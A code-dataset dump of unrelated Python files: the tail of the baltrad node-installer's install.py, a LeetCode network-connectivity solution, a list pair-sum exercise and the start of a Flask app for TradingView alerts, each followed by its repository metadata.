resides. Currently only used when installing bwrwp.\n NOTE that the library objects must have been compiled with -fPIC or similar for shared object capabilities,\n since it will be linked into a shared library.\n\n--with-lapacke=<lapackeroot> or <lapackeinc>,<lapackelib>\n Specifies where the lapacke.h include directory and the liblapacke.a directory reside. You can also\n specify a lapacke root directory that should contain the include and lib directories.\n Currently only used when installing bwrwp.\n NOTE that the library objects must have been compiled with -fPIC or similar for shared object capabilities,\n since it will be linked into a shared library.\n\n--bdb-port=<port>\n BDB server port\n [default: 8090]\n\n--bdb-uri=<uri>\n The BDB uri. By default this has no use even when specified. It will only be used\n if subsystems have been specified, so that you can specify a different BDB server. Also,\n if this is specified, bdb-port will not have any meaning.\n E.g. --bdb-uri=http://somehost:8090\n [Default: Not used]\n\n--bdb-pool-max-size=<size>\n Set the pool size for bdb connections to <size>\n [default: 10]\n\n--bdb-auth=<model>\n BDB authentication model. 
Valid values are:\n * 'noauth' - perform no authentication\n * 'keyczar' - authenticate using Keyczar, reusing host keys\n [default: keyczar]\n\n--bdb-storage=<type>\n BDB storage model. Valid values are:\n * db - store files in the database with a cache in $DATADIR\n * fs - store files in $DATADIR\n [default: db]\n \n--bdb-cache-size=<size> \n The size (in number of files) of the file cache for the database. Only valid \n if 'bdb-storage=db'.\n [default: 5000]\n \n--bdb-fileentry-cache-size=<size> \n The size (in number of files) of the file-entry cache between the database \n and the Baltrad application. A file's meta-data is placed in this cache \n when added to the database, or when the file is queried in the database. \n When performing queries on a file in the database, this cache is first \n checked, thus lowering the load on the database.\n [default: 500]\n\n--rebuild=<module1>,<module2>,...\n Will force a rebuild and installation of the specified modules. To get a \n list of available modules and their versions, see option --print-modules.\n E.g. --rebuild=TOMCAT,RAVE\n \n--print-modules\n Prints all available modules and their respective version.\n \n--print-config\n Prints the build configuration\n \n--exclude-tomcat\n Will exclude installation of tomcat. This is not a recommended procedure, but \n it is here for the possibility to use your own tomcat installation if it \n is necessary.\n\n--keystoredn=<dn>\n The distinguished name used in the keystore cert for the secure communication.\n If <dn> is yes, then a number of questions will be asked during the creation of the keystore.\n If <dn> is no, then a predefined dn will be created with the format\n \"CN=Unknown,OU=Unknown,O=Unknown,L=Unknown,ST=Unknown,C=Unknown\"\n Or you can specify your own DN, just keep the above format. Note that you cannot specify a dn with any\n spaces in it. If your DN contains spaces you will have to use 'yes' instead to get the questions\n [Default yes]\n \n--keystorepwd=<pwd>\n Specifies the password that should be used for the key. If this has not been defined, the tomcatpwd will be used.\n\n--tomcatport=<port>\n Specifies the port on which the tomcat installation should listen.\n Don't use together with --tomcaturl. \n [Default 8080]\n\n--tomcatsecureport=<port>\n Specifies the port on which the tomcat installation should listen for secure messages.\n [Default 8443]\n\n--tomcatfwdports=<httpport>,<httpsport>\n Specifies that port forwarding has to be supported by the node and hence a secondary mapping\n is added to the dex applicationContext. This attribute is typically used when having the tomcat\n server behind a firewall and proxying calls through a webserver like apache.\n \n--tomcaturl=<url>\n Specifies the tomcat url where the tomcat installation resides. Don't\n use together with --tomcatport. \n [Default http://localhost:8080]\n \n--tomcatpwd=<pwd>\n Specifies the password that should be used for the manager in the tomcat\n installation.\n \n--force\n Unused at the moment\n \n--experimental\n When running into problems with building, like missing libraries, link problems\n or other miscellaneous problems, this might be the option to specify. Some modules\n are currently being evaluated to determine whether they are stable enough to be used in production,\n and by specifying this option these modules will be built instead.\n \n--no-autostart\n Baltrad will not start automatically after the setup is finished, \n if this argument is used.\n \n--subsystems=(STANDALONE_RAVE, RAVE, BDB, DEX)\n If you are interested in running a standalone installation of RAVE, BDB or DEX. 
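(For example, a hypothetical call might pass --subsystems=BDB alone, or --subsystems=RAVE,DEX for several at once.) 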
It\n is possible to do so by specifying which subsystems should be installed.\n Since RAVE depends on the BALTRAD-DB python client API, you are able to specify\n a specific RAVE module called STANDALONE_RAVE which installs RAVE without any\n BDB-dependencies.\n\"\"\")\n\ndef parse_buildzlib_argument(arg):\n if arg.lower() == \"no\" or arg.lower() == \"false\":\n return False, None, None\n elif arg.lower() == \"yes\" or arg.lower() == \"true\":\n return True, None, None\n \n tokens = arg.split(\",\")\n if len(tokens) == 2:\n return False, tokens[0], tokens[1]\n elif len(tokens) == 1:\n return False, \"%s/include\"%tokens[0], \"%s/lib\"%tokens[0] \n else:\n raise InstallerException(\"--with-zlib should either be yes, no, <zlibroot> or <zlibinc>,<zliblib> where <zlibinc> and/or <zliblib> may be empty\")\n\ndef verify_buildfreetype_argument(arg):\n tokens = arg.split(\",\")\n if len(tokens) != 2:\n raise InstallerException(\"--with-freetype should be --with-freetype=<freetypeinc>,<freetypelib>\")\n\ndef validate_fwdports(arg):\n tokens = arg.split(\",\")\n if len(tokens) != 2:\n raise InstallerException(\"--tomcatfwdports should be called like --tomcatfwdports=<httpport>,<httpsport> where <httpport> and <httpsport> are numbers\")\n try:\n a1 = int(tokens[0])\n a2 = int(tokens[1])\n except:\n raise InstallerException(\"--tomcatfwdports should be called like --tomcatfwdports=<httpport>,<httpsport> where <httpport> and <httpsport> are numbers\")\n\ndef handle_tomcat_arguments(benv):\n if benv.hasArg(\"TOMCATPORT\") and benv.hasArg(\"TOMCATURL\"):\n # Verify that the ports do not conflict\n from urlparse import urlparse\n a = urlparse(benv.getArg(\"TOMCATURL\"))\n if a.port == None or \"%s\"%a.port != benv.getArg(\"TOMCATPORT\"):\n raise InstallerException(\"tomcatport and tomcaturl port differ\")\n elif benv.hasArg(\"TOMCATPORT\"):\n benv.addArg(\"TOMCATURL\", \"http://localhost:%s\"%benv.getArg(\"TOMCATPORT\"))\n elif benv.hasArg(\"TOMCATURL\"):\n from urlparse import urlparse\n a = urlparse(benv.getArg(\"TOMCATURL\"))\n if a.port == None:\n raise InstallerException(\"You must specify a port in the tomcat url\")\n benv.addArg(\"TOMCATPORT\", \"%d\"%a.port)\n else:\n benv.addArg(\"TOMCATPORT\", \"8080\")\n benv.addArg(\"TOMCATURL\", \"http://localhost:%s\"%benv.getArg(\"TOMCATPORT\")) \n \n\ndef parse_buildpsql_argument(arg):\n tokens = arg.split(\",\")\n if len(tokens) == 2:\n psqlinc = tokens[0]\n psqllib = tokens[1]\n elif len(tokens) == 1:\n psqlinc = \"%s/include\"%tokens[0]\n psqllib = \"%s/lib\"%tokens[0]\n else:\n raise InstallerException(\"--with-psql should either be <psqlroot> or <psqlinc>,<psqllib>\")\n \n if not os.path.isdir(psqlinc):\n raise InstallerException(\"Provided path (%s) does not seem to be usable as an include path.\"%psqlinc)\n if not os.path.isdir(psqllib):\n raise InstallerException(\"Provided path (%s) does not seem to be usable as a lib path.\"%psqllib)\n \n return psqlinc, psqllib\n\nif __name__==\"__main__\":\n import getpass\n optlist = []\n args = []\n try:\n optlist, args = getopt.getopt(sys.argv[1:], '', \n ['prefix=','tprefix=', 'jdkhome=','with-zlib=',\n 'with-psql=','with-bufr', 'with-rave','with-rave-gmap','with-bropo','with-beamb','with-bwrwp',\n 'with-hdfjava=', 'with-freetype=','rebuild=',\n 'with-blas=', 'with-cblas=', 'with-lapack=', 'with-lapacke=',\n 'bdb-pool-max-size=', \"bdb-port=\", \"bdb-uri=\", \"bdb-auth=\", \"bdb-storage=\", \n \"bdb-cache-size=\", \"bdb-fileentry-cache-size=\",\n 'rave-pgf-port=', 'rave-log-port=', \"rave-center-id=\", \"rave-dex-spoe=\",\n 'dbuser=', 'dbpwd=','dbname=','dbhost=','dbport=','keystore=','nodename=',\n 'reinstalldb','excludedb', 
'runas=','datadir=','warfile=',\n 'urlrepo=','gitrepo=','offline','enable-netcdf',\n 'print-modules', 'print-config', 'exclude-tomcat', 'recall-last-args',\n 'experimental','no-autostart','subsystems=',\n 'force','tomcatport=','tomcaturl=','tomcatpwd=',\n 'tomcatsecureport=', 'keystoredn=', 'keystorepwd=', 'tomcatfwdports=', 'help'])\n except getopt.GetoptError as e:\n usage(True, e.__str__())\n sys.exit(127)\n \n dorestore = False\n doprintconfig = False\n doprintmodules = False\n \n # First handle help and printouts misc options so that we don't get stuck on\n # any bad configuration properties.\n for o,a in optlist:\n if o == \"--help\":\n usage(False)\n sys.exit(0)\n elif o == \"--print-modules\":\n doprintmodules = True\n elif o == \"--recall-last-args\":\n dorestore = True\n elif o == \"--print-config\":\n doprintconfig = True\n \n env = buildenv()\n if dorestore:\n env.restore()\n \n env.excludeModule(\"RAVE\")\n env.excludeModule(\"RAVE-GMAP\")\n env.excludeModule(\"BROPO\")\n env.excludeModule(\"BBUFR\")\n env.excludeModule(\"BEAMB\")\n env.excludeModule(\"BWRWP\")\n \n reinstalldb=False\n rebuild = []\n experimental_build=False\n py3_enabled=True\n use_ravepy3_repo=True\n subsystems = []\n \n for o, a in optlist:\n if o == \"--prefix\":\n env.addArg(\"PREFIX\", a)\n elif o == \"--tprefix\":\n env.addArg(\"TPREFIX\", a)\n elif o == \"--jdkhome\":\n env.addArg(\"JDKHOME\", a)\n elif o == \"--dbuser\":\n env.addArg(\"DBUSER\", a)\n elif o == \"--dbpwd\":\n env.addArgInternal(\"DBPWD\", a)\n elif o == \"--dbname\":\n env.addArg(\"DBNAME\", a)\n elif o == \"--dbhost\":\n env.addArg(\"DBHOST\", a)\n elif o == \"--dbport\":\n env.addArg(\"DBPORT\", a)\n elif o == \"--nodename\":\n env.addArg(\"NODENAME\", a)\n elif o == \"--keystore\":\n env.addArg(\"KEYSTORE\", a)\n elif o == \"--rebuild\":\n rebuild = a.split(\",\")\n elif o == \"--with-zlib\":\n env.addArg(\"ZLIBARG\", a)\n elif o == \"--with-psql\":\n env.addArg(\"PSQLARG\", a)\n elif o == \"--with-hdfjava\":\n if not os.path.isdir(a):\n print(\"--with-hdfjava must be provided with the root directory of the hdf-java installation\")\n sys.exit(127)\n else:\n env.addArg(\"HDFJAVAHOME\", a)\n elif o == \"--enable-netcdf\":\n env.addArg(\"ENABLE_NETCDF\", True) \n elif o == \"--with-freetype\":\n env.addArg(\"FREETYPE\", a)\n elif o == \"--exclude-tomcat\":\n env.excludeModule(\"TOMCAT\")\n elif o == \"--tomcatport\":\n env.addArg(\"TOMCATPORT\", a)\n elif o == \"--keystorepwd\":\n env.addArgInternal(\"KEYSTORE_PWD\", a)\n elif o == \"--keystoredn\":\n env.addArg(\"KEYSTORE_DN\", a)\n elif o == \"--tomcatsecureport\":\n env.addArg(\"TOMCATSECUREPORT\", a)\n elif o == \"--tomcaturl\":\n env.addArg(\"TOMCATURL\", a)\n elif o == \"--tomcatpwd\":\n env.addArgInternal(\"TOMCATPWD\", a)\n elif o == \"--tomcatfwdports\":\n env.addArg(\"TOMCATFWDPORTS\", a)\n elif o == \"--bdb-pool-max-size\":\n env.addArg(\"BDB_POOL_MAX_SIZE\", a)\n elif o == \"--bdb-port\":\n env.addArg(\"BDB_PORT\", a)\n elif o == \"--bdb-uri\":\n env.addArg(\"BDB_URI\", a)\n elif o == \"--bdb-auth\":\n env.addArg(\"BDB_AUTH\", a)\n elif o == \"--bdb-storage\":\n env.addArg(\"BDB_STORAGE\", a)\n elif o == \"--bdb-cache-size\":\n env.addArg(\"BDB_CACHE_SIZE\", a)\n elif o == \"--bdb-fileentry-cache-size\":\n env.addArg(\"BDB_FILEENTRY_CACHE_SIZE\", a)\n elif o == \"--with-bufr\":\n env.addArg(\"WITH_BBUFR\", True)\n elif o == \"--with-rave\":\n env.addArg(\"WITH_RAVE\", True)\n elif o == \"--rave-pgf-port\":\n env.addArg(\"RAVE_PGF_PORT\", a)\n elif o == 
\"--rave-log-port\":\n env.addArg(\"RAVE_LOG_PORT\", a)\n elif o == \"--rave-center-id\":\n env.addArg(\"RAVE_CENTER_ID\", a)\n elif o == \"--rave-dex-spoe\":\n env.addArg(\"RAVE_DEX_SPOE\", a)\n elif o == \"--with-rave-gmap\":\n env.addArg(\"WITH_RAVE_GMAP\", True)\n elif o == \"--with-bropo\":\n env.addArg(\"WITH_BROPO\", True)\n elif o == \"--with-beamb\":\n env.addArg(\"WITH_BEAMB\", True)\n elif o == \"--with-bwrwp\":\n env.addArg(\"WITH_BWRWP\", True)\n elif o == \"--subsystems\":\n subsystems = a.split(\",\")\n elif o == \"--reinstalldb\":\n reinstalldb=True\n env.addArgInternal(\"REINSTALLDB\", True)\n elif o == \"--excludedb\":\n env.addArgInternal(\"EXCLUDEDB\", True)\n elif o == \"--offline\":\n env.addArgInternal(\"INSTALL_OFFLINE\", True)\n elif o == \"--runas\":\n env.addArg(\"RUNASUSER\", a)\n elif o == \"--datadir\":\n env.addArg(\"DATADIR\", a)\n elif o == \"--warfile\":\n env.addArgInternal(\"WARFILE\", a)\n elif o == \"--urlrepo\":\n env.addArg(\"URLREPO\", a)\n elif o == \"--gitrepo\":\n env.addArg(\"GITREPO\", a)\n elif o == \"--with-blas\":\n env.addArg(\"BLASARG\", a)\n elif o == \"--with-cblas\":\n env.addArg(\"CBLASARG\", a)\n elif o == \"--with-lapack\":\n env.addArg(\"LAPACKARG\", a)\n elif o == \"--with-lapacke\":\n env.addArg(\"LAPACKEARG\", a)\n elif o == \"--no-autostart\":\n env.addArgInternal(\"NO_AUTOSTART\", True)\n elif o == \"--help\":\n pass\n elif o == \"--print-modules\":\n pass\n elif o == \"--print-config\":\n pass\n elif o == \"--recall-last-args\":\n pass\n elif o == \"--experimental\":\n experimental_build = True\n else:\n usage(True, \"Unsupported argument: %s\"%o)\n sys.exit(127)\n\n checkpwd = False\n # We don't want to force a tomcat pwd to be specified unless we are installing something\n # that needs tomcat.\n if len(subsystems) == 0 or \"DEX\" in subsystems:\n if args != None and len(args) > 0 and args[0] in [\"install\",\"check\"]:\n checkpwd = True\n\n if checkpwd and not env.hasArg(\"TOMCATPWD\"):\n print(\"--tomcatpwd not specified, please specify password.\")\n pwd = None\n while pwd == None:\n pwd1 = raw_input(\"Enter password: \")\n pwd2 = raw_input(\"Again: \")\n if pwd1 == pwd2:\n pwd = pwd1\n else:\n print(\"Passwords not matching\")\n env.addArgInternal(\"TOMCATPWD\", pwd)\n\n if checkpwd:\n if not env.hasArg(\"KEYSTORE_PWD\"):\n print(\"--keystorepwd not specified, using tomcatpwd.\")\n env.addArgInternal(\"KEYSTORE_PWD\", env.getArg(\"TOMCATPWD\"))\n\n #Verify FWD ports if defined\n if env.hasArg(\"TOMCATFWDPORTS\"):\n validate_fwdports(env.getArg(\"TOMCATFWDPORTS\"))\n\n # set defaults for whatever arguments we didn't get from the user\n env.addUniqueArg(\"PREFIX\", \"/opt/baltrad\")\n env.addUniqueArg(\"TPREFIX\", env.expandArgs(\"${PREFIX}/third_party\"))\n env.addUniqueArg(\"URLREPO\", \"http://ni.baltrad.eu\")\n env.addUniqueArg(\"GITREPO\", \"https://github.com/baltrad\")\n env.addUniqueArg(\"HDFJAVAHOME\", env.expandArgs(\"${TPREFIX}/hdf-java\"))\n env.addUniqueArg(\"DBUSER\", \"baltrad\")\n env.addUniqueArgInternal(\"DBPWD\", \"baltrad\")\n env.addUniqueArg(\"DBNAME\", \"baltrad\")\n env.addUniqueArg(\"DBHOST\", \"127.0.0.1\")\n env.addUniqueArg(\"DBPORT\", \"5432\")\n env.addUniqueArg(\"RUNASUSER\", getpass.getuser())\n env.addUniqueArg(\"KEYSTORE\", env.expandArgs(\"${PREFIX}/etc/bltnode-keys\"))\n env.addUniqueArg(\"KEYSTORE_DN\", \"yes\")\n env.addUniqueArg(\"ENABLE_NETCDF\", False)\n\n env.addArg(\"ENABLE_PY3\", True)\n\n if not env.hasArg(\"NODENAME\"):\n import socket\n nodename = socket.gethostname()\n 
print(\"NODENAME WASN'T SPECIFIED, DEFAULTING TO: %s\"%nodename)\n env.addArg(\"NODENAME\", nodename)\n \n #\n # We must ensure that the tomcatport and tomcaturl port is not conflicting\n # and that the tomcat arguments always are there.\n #\n handle_tomcat_arguments(env)\n env.addUniqueArg(\"TOMCATSECUREPORT\", \"8443\")\n \n env.addUniqueArg(\"BDB_POOL_MAX_SIZE\", \"10\")\n env.addUniqueArg(\"BDB_PORT\", \"8090\")\n env.addUniqueArg(\"BDB_AUTH\", \"keyczar\")\n env.addUniqueArg(\"BDB_STORAGE\", \"db\")\n env.addUniqueArg(\"BDB_CACHE_SIZE\", \"5000\")\n env.addUniqueArg(\"BDB_FILEENTRY_CACHE_SIZE\", \"500\")\n env.addUniqueArg(\"RAVE_PGF_PORT\", \"8085\")\n env.addUniqueArg(\"RAVE_LOG_PORT\", \"8089\")\n env.addUniqueArg(\"RAVE_CENTER_ID\", \"82\")\n env.addUniqueArg(\"RAVE_DEX_SPOE\", env.expandArgs(\"localhost:${TOMCATPORT}\"))\n \n modules = MODULES\n \n #\n # If we are running in experimental mode, then mark all affected installers with\n # that information.\n #\n for m in modules:\n if experimental and isinstance(m, experimental):\n m.setExperimentalMode(True)\n if isinstance(m, pychoiceinstaller):\n m.enablePython3(True) # We don't allow anything but python3 any longer.\n if isinstance(m.package(), rave_package):\n m.package().enablePython3(True) # We don't allow anything but python3 any longer.\n\n #sys.exit(0)\n #\n # We want to ensure that user understands that it is nessecary to specify\n # --bdb-uri when installing subsystem depending on BDB\n #\n if len(subsystems) > 0 and args[0] != \"clean\":\n if (\"RAVE\" in subsystems or \"DEX\" in subsystems) and \"BDB\" not in subsystems:\n if not env.hasArg(\"BDB_URI\"):\n raise InstallerException(\"Trying to install subsystem dependant on BDB without providing --bdb-uri\")\n \n #\n # We might only want to install specific subsystems\n #\n if len(subsystems) > 0:\n modules = filter_subsystems(modules, subsystems)\n else:\n subsystems = VALID_SUBSYSTEMS;\n \n env.addArgInternal(\"SUBSYSTEMS\", subsystems)\n\n #\n # Print the configuration settings\n #\n if doprintconfig or doprintmodules:\n if doprintconfig:\n print(\"CONFIGURATION PARAMETERS\")\n print_arguments(env)\n print(\"\")\n if doprintmodules:\n print(\"MODULES\")\n print_modules(env, modules)\n print(\"\")\n \n if len(args) == 0:\n sys.exit(0)\n \n env.remember() # Remember the previous arguments\n\n if len(args) != 1:\n usage(True, \"You can only specify one command %s\"%str(args))\n sys.exit(127)\n \n if args[0] not in [\"install\", \"check\", \"clean\", \"fetch\", \"dist\"]:\n usage(True, \"Unknown command %s\"%str(args[0]))\n sys.exit(127)\n\n if env.getArg(\"ENABLE_NETCDF\") == False:\n env.excludeModule(\"NETCDF\")\n\n if env.hasArg(\"WITH_BBUFR\") and env.getArg(\"WITH_BBUFR\") == True:\n env.removeExclude(\"BBUFR\")\n\n if env.hasArg(\"WITH_RAVE\") and env.getArg(\"WITH_RAVE\") == True:\n env.removeExclude(\"RAVE\")\n\n if env.hasArg(\"WITH_RAVE_GMAP\") and env.getArg(\"WITH_RAVE_GMAP\") == True:\n env.removeExclude(\"RAVE\")\n env.removeExclude(\"RAVE-GMAP\")\n\n if env.hasArg(\"WITH_BROPO\") and env.getArg(\"WITH_BROPO\") == True:\n env.removeExclude(\"RAVE\")\n env.removeExclude(\"BROPO\")\n \n if env.hasArg(\"WITH_BEAMB\") and env.getArg(\"WITH_BEAMB\") == True:\n env.removeExclude(\"RAVE\")\n env.removeExclude(\"BEAMB\")\n \n if env.hasArg(\"WITH_BWRWP\") and env.getArg(\"WITH_BWRWP\") == True:\n env.removeExclude(\"RAVE\")\n env.removeExclude(\"BWRWP\")\n \n # Freetype is not an actual module, it's just an indicator when building\n # PIL\n if 
env.hasArg(\"FREETYPE\"):\n verify_buildfreetype_argument(env.getArg(\"FREETYPE\"))\n \n if env.hasArg(\"ZLIBARG\"):\n buildzlib, zinc, zlib = parse_buildzlib_argument(env.getArg(\"ZLIBARG\"))\n env.addArgInternal(\"ZLIBINC\", zinc)\n env.addArgInternal(\"ZLIBLIB\", zlib)\n if buildzlib == False:\n env.excludeModule(\"ZLIB\")\n \n if env.hasArg(\"PSQLARG\"):\n psqlinc, psqllib = parse_buildpsql_argument(env.getArg(\"PSQLARG\"))\n env.addArgInternal(\"PSQLINC\", psqlinc)\n env.addArgInternal(\"PSQLLIB\", psqllib)\n\n validators = []\n if \"BDB\" in subsystems or \"DEX\" in subsystems:\n validators.append(psqlvalidator())\n validators.append(jdkvalidator())\n validators.append(zlibvalidator())\n validators.append(doxygenvalidator())\n \n if args[0] in [\"install\", \"check\"]:\n for validator in validators:\n validator.validate(env)\n\n if not env.hasArg(\"JDKHOME\"):\n print(\"You must specify --jdkhome=... when installing the node\")\n sys.exit(127)\n\n # bdb storage needs a data directory \n if not env.hasArg(\"DATADIR\"):\n env.addArg(\"DATADIR\", env.expandArgs(\"$PREFIX/bdb_storage\"))\n\n if args[0] in [\"install\"]:\n # Setup the general ld library path that will be the one pointing out\n # all relevant libraries when the system has been installed\n #\n ldpath = \"$TPREFIX/lib\"\n ldpath = \"$HDFJAVAHOME/lib/linux:%s\"%ldpath\n ldpath = \"%s:$PREFIX/hlhdf/lib\"%ldpath\n if not env.isExcluded(\"BBUFR\"):\n ldpath = \"%s:$PREFIX/bbufr/lib\"%ldpath\n ldpath = \"%s:$PREFIX/baltrad-db/lib\"%ldpath\n ldpath = \"%s:$PREFIX/lib\"%ldpath\n if env.hasArg(\"PSQLLIB\") and env.getArg(\"PSQLLIB\") != None:\n ldpath = \"%s:$PSQLLIB\"%ldpath\n if env.hasArg(\"ZLIBLIB\") and env.getArg(\"ZLIBLIB\") != None:\n ldpath = \"%s:$ZLIBLIB\"%ldpath\n \n env.setLdLibraryPath(\"%s:$$LD_LIBRARY_PATH\"%ldpath)\n\n # And setup the path as well\n pth=\"$TPREFIX/bin\"\n pth=\"%s:$PREFIX/bin\"%pth\n pth=\"%s:$PREFIX/hlhdf/bin\"%pth\n pth=\"%s:$PREFIX/beast/bin\"%pth\n pth=\"%s:$PREFIX/baltrad-db/bin\"%pth\n\n env.setPath(\"%s:$$PATH\"%pth)\n\n # We want to wrap everything up in some scripts\n # so that we can stop/start the node\n spath = pth\n sldpath = ldpath\n \n if not env.isExcluded(\"BEAMB\"):\n sldpath = \"$PREFIX/beamb/lib:%s\"%sldpath\n\n if not env.isExcluded(\"BROPO\"):\n sldpath = \"$PREFIX/bropo/lib:%s\"%sldpath\n spath = env.expandArgs(\"$PREFIX/bropo/bin:%s\"%spath)\n\n if not env.isExcluded(\"BWRWP\"):\n sldpath = \"$PREFIX/baltrad-wrwp/lib:%s\"%sldpath\n spath = env.expandArgs(\"$PREFIX/baltrad-wrwp/bin:%s\"%spath)\n \n if not env.isExcluded(\"RAVE\"):\n sldpath = \"$PREFIX/rave/lib:%s\"%sldpath\n spath = env.expandArgs(\"$PREFIX/rave/bin:%s\"%spath)\n\n script = nodescripts(\n \"%s\"%spath,\n \"%s\"%sldpath,\n \"1.0.0\",\n raveinstalled=not env.isExcluded(\"RAVE\"),\n subsystems=subsystems\n )\n\n script.create_scripts(env)\n env.setNodeScript(script)\n\n # Set the installer path\n env.setInstallerPath(os.path.dirname(os.path.dirname(os.path.realpath(sys.argv[0]))))\n\n if args[0] in [\"install\"]:\n if reinstalldb == True:\n if not \"DBINSTALL\" in rebuild:\n rebuild.append(\"DBINSTALL\")\n\n ni = node_installer(modules, rebuild)\n if args[0] == \"install\":\n ni.install(env)\n elif args[0] == \"check\":\n pass\n elif args[0] == \"clean\":\n ni.clean(env)\n elif args[0] == \"fetch\":\n ni.fetch_offline_content(env)\n elif args[0] == \"dist\":\n 
ni.create_offline_tarball(env)\n","repo_name":"baltrad/node-installer","sub_path":"bin/install.py","file_name":"install.py","file_ext":"py","file_size_in_byte":45692,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"}
{"seq_id":"44037078765","text":"\"\"\"\nThere are n computers numbered from 0 to n - 1 connected by ethernet cables forming a network, where connections[i] = [ai, bi] represents a connection between computers ai and bi. Any computer can reach any other computer directly or indirectly through the network.\nYou are given the initial computer network connections. You can extract certain cables between two directly connected computers, and place them between any pair of disconnected computers to make them directly connected.\nReturn the minimum number of times you need to do this in order to make all the computers connected. If it is not possible, return -1.\nExample 1:\nInput: n = 4, connections = [[0,1],[0,2],[1,2]]\nOutput: 1\nExplanation: Remove the cable between computers 1 and 2 and place it between computers 1 and 3.\nExample 2:\nInput: n = 6, connections = [[0,1],[0,2],[0,3],[1,2],[1,3]]\nOutput: 2\nExample 3:\nInput: n = 6, connections = [[0,1],[0,2],[0,3],[1,2]]\nOutput: -1\nExplanation: There are not enough cables.\n\"\"\"\n\n\"\"\"\nI first thought I could use a process of elimination in a single pass: if both computers in a pair had already been visited, I would have an additional cable to use, and the number of unconnected computers left would be the number of cables I needed minus 1. However, this does not take into account that a disconnected computer does not have to be in isolation; it can belong to a group that is disconnected from the other computers. So the solution I finally came up with was this: initialise a dictionary with each node as a key and a list as its value. For every connection pair, append each endpoint to the other endpoint's list to signify they are connected. Then keep a visited array of length n. After this, use depth-first search on each unvisited key in the dictionary. 
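For example, with n = 4 and connections = [[0,1],[0,2],[1,2]], the DFS launches twice (once for the component {0,1,2} and once for the isolated node 3), and the one redundant cable [1,2] can be moved to join them, giving 2 - 1 = 1 operation. 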
If it is possible to visit every node in the first DFS pass, the graph is already connected. Otherwise each DFS launch marks one whole component, and connecting k components into one network takes k-1 cables, so the function returns the number of DFS launches minus 1 (provided there are at least n-1 cables in total, which is checked up front).\n\"\"\"\n\ndef makeConnected(n,connections):\n\n \n # fewer than n-1 cables can never connect n computers\n if len(connections) < n-1:\n return -1\n visited = [0] * n\n \n\n # adjacency lists, one entry per node\n theobject = {}\n for x in range(n):\n theobject[x] = [] \n for i in range(len(connections)):\n\n if connections[i][0] not in theobject[connections[i][1]]:\n theobject[connections[i][1]].append(connections[i][0])\n \n if connections[i][1] not in theobject[connections[i][0]]:\n theobject[connections[i][0]].append(connections[i][1])\n \n numberneeded = 0\n\n def dfs(i,visited):\n if visited[i]== 0:\n visited[i] = 1\n for j in range(len(theobject[i])):\n if visited[theobject[i][j]] == 0:\n dfs(theobject[i][j],visited)\n\n # every DFS launch below marks one connected component\n for i in range(len(visited)):\n if visited[i] == 0:\n dfs(i,visited)\n numberneeded+=1\n return numberneeded-1","repo_name":"AlexeiVartoumian/leetcodeRepository","sub_path":"Graph/number of operations to make network connected.py","file_name":"number of operations to make network connected.py","file_ext":"py","file_size_in_byte":2854,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"}
{"seq_id":"41498929266","text":"#lst=[4,3,2,1]\n#read an element from the console\n#print the pairs of elements that sum to it\n\n\n#6\n\nlst=[4,3,2,1]\nread=int(input(\"enter a number\"))\nlst.sort()\nlow=0\nupp=len(lst)-1\nwhile(low<=upp):\n data=lst[low]+lst[upp]\n if(data==read):\n print(\"pairs are\",lst[low],lst[upp])\n break\n elif(data>read):\n upp=upp-1 # sum too large: move the upper pointer down (was upp+1, which walks past the end)\n else:\n low=low+1\n","repo_name":"jitheshlaledk/python","sub_path":"collections/list/list13.py","file_name":"list13.py","file_ext":"py","file_size_in_byte":343,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"}
{"seq_id":"42682687890","text":"# Workaround for CORS blocking the browser\n# https://blog.gtwang.org/web-development/chrome-configuration-for-access-control-allow-origin/\n\nimport json\nfrom flask import Flask, request, abort, send_file, render_template, url_for\nfrom datetime import datetime,timedelta\nfrom dbhelper import DbHelper\nfrom myquery import MyRequest\n\n\nimport socket\nimport requests.packages.urllib3.util.connection as urllib3_cn\n\nfrom flask_cors import CORS\n\nimport os\n\napp = Flask(__name__)\nCORS(app)\n\ndef WriteData(message,symbol):\n db = DbHelper('tradingview.db','ALERTMESSAGE')\n\n if not db.IsInit():\n db.CreateAlertMessage()\n db.InitAlertMessage()\n \n idx = db.GetID()\n \n db.WriteAlertMessage(idx + 1, message, symbol, datetime.now())\n \ndef WriteThreeBig(unit, buy, sell, diff, date):\n db = DbHelper('tradingview.db','THREE_BIG')\n \n if not db.IsInit():\n db.CreateThreeBig()\n db.InitThreeBig()\n \n idx = db.GetID()\n \n db.WriteThreeBig(idx + 1, unit, buy, sell, diff, date, datetime.now())\n \ndef CheckCurrentMonthData(date):\n db = DbHelper('tradingview.db','THREE_BIG')\n \n endDate = datetime.strptime(date, '%Y%m%d')\n startDate = endDate + timedelta(days=-endDate.day+1)\n \n print(startDate,endDate)\n \n emptydays = db.CheckSelfBusinessTradeBySelf(startDate.strftime('%Y%m%d'), endDate.strftime('%Y%m%d'))\n \n print(emptydays)\n \n return emptydays\n\ndef ReadThreeBigByMonth(date):\n db = DbHelper('tradingview.db','THREE_BIG')\n \n endDate = datetime.strptime(date, '%Y%m%d')\n startDate = endDate + timedelta(days=-endDate.day+1)\n \n return db.ReadSelfBusinessTradeBySelf(startDate.strftime('%Y%m%d'), endDate.strftime('%Y%m%d'))\n\n\n@app.route('/')\ndef hello_world():\n return '

    Service is online!

    '\n\n# @app.route('/favicon.ico/')\n# def favicon():\n \n# return\n \n\n@app.route('/sample/',defaults={'req_path': ''})\n@app.route('/sample/<path:req_path>')\ndef index(req_path):\n BASE_DIR = '..\\\\stock_tracking_system\\\\project'\n\n print(req_path)\n\n if not req_path:\n req_path = 'index.html'\n\n # Joining the base and the requested path\n abs_path = os.path.join(BASE_DIR, req_path)\n\n # Return 404 if path doesn't exist\n if not os.path.exists(abs_path):\n return abort(404)\n\n # Check if path is a file and serve\n if os.path.isfile(abs_path):\n return send_file(abs_path)\n\n # Show directory contents\n files = os.listdir(abs_path)\n return render_template('index.html', files=files)\n\n\n\n# @app.route('/', defaults={'req_path': ''})\n# @app.route('/sample/<path:req_path>')\n# def dir_listing(req_path):\n# BASE_DIR = 'C:/Users/purem/Desktop/stock_tracking_system/project'\n\n# # Joining the base and the requested path\n# abs_path = os.path.join(BASE_DIR, req_path)\n\n# # Return 404 if path doesn't exist\n# if not os.path.exists(abs_path):\n# return abort(404)\n\n# # Check if path is a file and serve\n# if os.path.isfile(abs_path):\n# return 